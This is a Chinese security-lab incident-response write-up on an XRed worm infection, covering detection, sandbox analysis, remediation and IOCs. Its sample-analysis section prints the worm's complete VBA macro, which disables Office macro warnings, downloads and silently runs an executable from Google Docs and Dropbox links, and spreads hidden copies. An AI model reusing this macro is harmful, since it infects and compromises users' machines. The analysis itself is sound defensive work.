记一次XRed病毒攻击应急分析

admin
admin
admin
105242
文章
87
评论
2022年3月5日04:55:26评论544 views字数 6236阅读20分47秒阅读模式



网安引领时代,弥天点亮未来   






 

记一次XRed病毒攻击应急分析

0x00序言

在日常工作中,如果办公电脑或者个人PC有以下两个方面的异常行为,则大概率已经中招XRed病毒,它属于AutoRun家族。具体情况如下:

1.打开xlsx电子表格文件,会提示宏并且文件内容也会改变,最关键的一个特点是关闭电子表格文件会进行后缀名的改变。(xlsx--xlsm

2. 在DNS请求流量中会有该恶意域名(xred.mooo.com)解析请求记录,周期为每10分钟一次。



 

记一次XRed病毒攻击应急分析

0x01事件起因

被通知个人PC发现DNS异常解析行为,定位终端(IP)进行问题排查。

记一次XRed病毒攻击应急分析


 

记一次XRed病毒攻击应急分析

0x02应急排查

定位到具体的终端,发现是一台windows10虚拟机,进行了网络及进程、注册表、启动项等相关排查,除了有DNS的异常解析行为(每10分钟一次)再无其他的影响。具体排查如下:

1.通过进程的异常分析,发现该病毒伪装成“Synaptics触摸板驱动程序”。

2.对父进程进行追踪查找并进行kill,从而提取到该病毒样本。(在提取过程中注意打开显示隐藏文件)

记一次XRed病毒攻击应急分析

3.然后使用火绒进行全面查杀,并无发现风险。

记一次XRed病毒攻击应急分析


 

记一次XRed病毒攻击应急分析

0x03样本分析

提取病毒样本,进行下一步分析。具体流程如下:

1.使用IDA工具查文件的基础信息

MD5: FBA313D7C15B420EE31C263E79EA90A7

记一次XRed病毒攻击应急分析

2.使用Strings查看程序包含的字符信息

记一次XRed病毒攻击应急分析

3.获取这些基础信息,通过奇安信、360、微步在线云沙箱自动化分析。

奇安信沙箱

记一次XRed病毒攻击应急分析

360沙箱

记一次XRed病毒攻击应急分析

微步沙箱

记一次XRed病毒攻击应急分析

4.样本运行详细过程

主机行为

记一次XRed病毒攻击应急分析

进程行为

记一次XRed病毒攻击应急分析

网络行为

记一次XRed病毒攻击应急分析

记一次XRed病毒攻击应急分析

5.通过对样本的自动化分析,已经获取了了很多关键信息,获取宏代码如下

Dim SheetsChanged As BooleanDim SheetCount As Integer
Private Sub Workbook_Open()  Dim i As Integer  For i = 1 To ActiveWorkbook.Sheets.Count    ActiveWorkbook.Sheets(i).Visible = xlSheetVisible  Next i    RegKeySave "HKCUSoftwareMicrosoftOffice" & Application.Version & "ExcelSecurityVBAWarnings", 1, "REG_DWORD"  RegKeySave "HKCUSoftwareMicrosoftOffice" & Application.Version & "WordSecurityVBAWarnings", 1, "REG_DWORD"    Application.DisplayAlerts = False  SheetCount = Worksheets.Count    Call MPS    ActiveWorkbook.Sheets(1).Select  SheetsChanged = FalseEnd Sub
Private Sub Workbook_BeforeClose(Cancel As Boolean)  If Not SheetsChanged Then    ActiveWorkbook.Saved = True  End IfEnd Sub
Private Sub Workbook_SheetChange(ByVal Sh As Object, ByVal Target As Range)  SheetsChanged = TrueEnd Sub
Private Sub Workbook_NewSheet(ByVal Sh As Object)  SheetsChanged = TrueEnd Sub
Private Sub Workbook_SheetActivate(ByVal Sh As Object)  If ActiveWorkbook.Sheets.Count <> SheetCount Then    SheetsChanged = True    SheetCount = ActiveWorkbook.Sheets.Count  End IfEnd Sub
Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)  Dim i As Integer  Dim AIndex As Integer  Dim FName
  AIndex = ActiveWorkbook.ActiveSheet.Index
  If SaveAsUI = False Then    Cancel = True    Application.EnableEvents = False    Application.ScreenUpdating = False        For i = 1 To ActiveWorkbook.Sheets.Count - 1      ActiveWorkbook.Sheets(i).Visible = xlSheetHidden    Next i    ActiveWorkbook.Save          For i = 1 To ActiveWorkbook.Sheets.Count      ActiveWorkbook.Sheets(i).Visible = xlSheetVisible    Next i    ActiveWorkbook.Sheets(AIndex).Select    SheetsChanged = False        Application.ScreenUpdating = True    Application.EnableEvents = True  Else    Cancel = True    Application.EnableEvents = False    Application.ScreenUpdating = False        For i = 1 To ActiveWorkbook.Sheets.Count - 1      ActiveWorkbook.Sheets(i).Visible = xlSheetHidden    Next i        FName = Application.GetSaveAsFilename(fileFilter:="Excel Çalışma Kitabı (*.xlsm), *.xlsm")    If FName <> False Then      ActiveWorkbook.SaveAs Filename:=FName, FileFormat:=xlOpenXMLWorkbookMacroEnabled      SaveAsInj ActiveWorkbook.Path    End If        For i = 1 To ActiveWorkbook.Sheets.Count      ActiveWorkbook.Sheets(i).Visible = xlSheetVisible    Next i    ActiveWorkbook.Sheets(AIndex).Select    SheetsChanged = False            Application.ScreenUpdating = True    Application.EnableEvents = True  End IfEnd Sub
Sub SaveAsInj(DIR As String)  Dim FSO As Object  Dim FN As String    Set FSO = CreateObject("scripting.filesystemobject")  FN = Environ("ALLUSERSPROFILE") & "SynapticsSynaptics.exe"    If FSO.FileExists(FN) Then    If Not FSO.FileExists(DIR & "~$cache1") Then      FileCopy FN, DIR & "~$cache1"    End If    SetAttr (DIR & "~$cache1"), vbHidden + vbSystem  End IfEnd Sub
Function RegKeyRead(i_RegKey As String) As String  Dim myWS As Object
  On Error Resume Next  Set myWS = CreateObject("WScript.Shell")  RegKeyRead = myWS.RegRead(i_RegKey)End Function
Function RegKeyExists(i_RegKey As String) As BooleanDim myWS As Object
  On Error GoTo ErrorHandler  Set myWS = CreateObject("WScript.Shell")  myWS.RegRead i_RegKey  RegKeyExists = True  Exit Function  ErrorHandler:  RegKeyExists = FalseEnd Function
Sub RegKeySave(i_RegKey As String, _               i_Value As String, _      Optional i_Type As String = "REG_SZ")Dim myWS As Object
  Set myWS = CreateObject("WScript.Shell")  myWS.RegWrite i_RegKey, i_Value, i_TypeEnd Sub
Sub MPS()  Dim FSO As Object  Dim FP(1 To 3), TMP, URL(1 To 3) As String    Set FSO = CreateObject("scripting.filesystemobject")  FP(1) = ActiveWorkbook.Path & "~$cache1"  FP(2) = ActiveWorkbook.Path & "Synaptics.exe"
  URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"  URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"  URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"  TMP = Environ("Temp") & "~$cache1.exe"    If FSO.FileExists(FP(1)) Then    If Not FSO.FileExists(TMP) Then      FileCopy FP(1), TMP    End If    Shell TMP, vbHide  ElseIf FSO.FileExists(FP(2)) Then    If Not FSO.FileExists(TMP) Then      FileCopy FP(2), TMP    End If    Shell TMP, vbHide  Else    If FSO.FileExists(Environ("ALLUSERSPROFILE") & "SynapticsSynaptics.exe") Then      Shell Environ("ALLUSERSPROFILE") & "SynapticsSynaptics.exe", vbHide    ElseIf FSO.FileExists(Environ("WINDIR") & "System32SynapticsSynaptics.exe") Then      Shell Environ("WINDIR") & "System32SynapticsSynaptics.exe", vbHide    ElseIf Not FSO.FileExists(TMP) Then      If FDW((URL(1)), (TMP)) Then      ElseIf FDW((URL(2)), (TMP)) Then      ElseIf FDW((URL(3)), (TMP)) Then      End If      If FSO.FileExists(TMP) Then        Shell TMP, vbHide      End If    Else      Shell TMP, vbHide    End If      End If  End Sub
Function FDW(MYU, NMA As String) As Boolean  Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")  If WinHttpReq Is Nothing Then    Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")  End If
  WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"  WinHttpReq.Option(6) = AllowRedirects  WinHttpReq.Open "GET", MYU, False  WinHttpReq.Send    If (WinHttpReq.Status = 200) Then    If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then      FDW = True      Set oStream = CreateObject("ADODB.Stream")      oStream.Open      oStream.Type = 1      oStream.Write WinHttpReq.ResponseBody      oStream.SaveToFile (NMA)      oStream.Close    Else       FDW = False    End If  Else    FDW = False  End IfEnd Function

 

记一次XRed病毒攻击应急分析

0x04病毒归类

通过全流量留存或者进行数据包捕获,然后使用弥天实验室开发的dga恶意域名检测工具进行家族归类和受害主机定位。

这里使用的是沙箱运行留存的数据包,具体使用效果如下:

(工具使用和下载请参见HVV之基于360数据的dga恶意域名检测工具:

https://mp.weixin.qq.com/s/EPiQY_8i4LWP_S3aaX2yYw)

记一次XRed病毒攻击应急分析

 

记一次XRed病毒攻击应急分析

0x05修复建议

  1. 安装杀毒软件,定期升级病毒库

  2. 不要点击来源不明的邮件以及附件和链接

  3. 打全系统及应用程序补丁并及时更新

  4. 采用高强度的密码,避免使用弱口令密码,并定期更换密码(终端基线)

  5. 尽量关闭不必要的文件共享

  6. 提升安全意识

 

记一次XRed病毒攻击应急分析

0x06参考链接

https://www.freebuf.com/articles/endpoint/222991.html

https://s.tencent.com/research/report/880.html

       
IOCs:

md5
13358cfb6040fd4b2dba262f209464de
FBA313D7C15B420EE31C263E79EA90A7


C2 & URL
xred.mooo.com
freedns.afraid.org/api/?action=getdyndns&sha=a30fa9*****797bcc613562978
hxxps://docs.google.com/uc?id=0BxsM*****aHFYVkQxeFk&export=download
hxxps://www.dropbox.com/s/zh*****hwylq/Synaptics.rar?dl=1
hxxp://xred.site50.net/syn/*****.rar

病毒作者邮箱地址

[email protected]

[email protected];

[email protected]



记一次XRed病毒攻击应急分析 

知识分享完了

喜欢别忘了关注我们哦~



学海浩茫,

予以风动,
必降弥天之润!


   弥  天

安全实验室

记一次XRed病毒攻击应急分析


原文始发于微信公众号(弥天安全实验室):记一次XRed病毒攻击应急分析

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月5日04:55:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次XRed病毒攻击应急分析https://cn-sec.com/archives/816789.html

发表评论

匿名网友 填写信息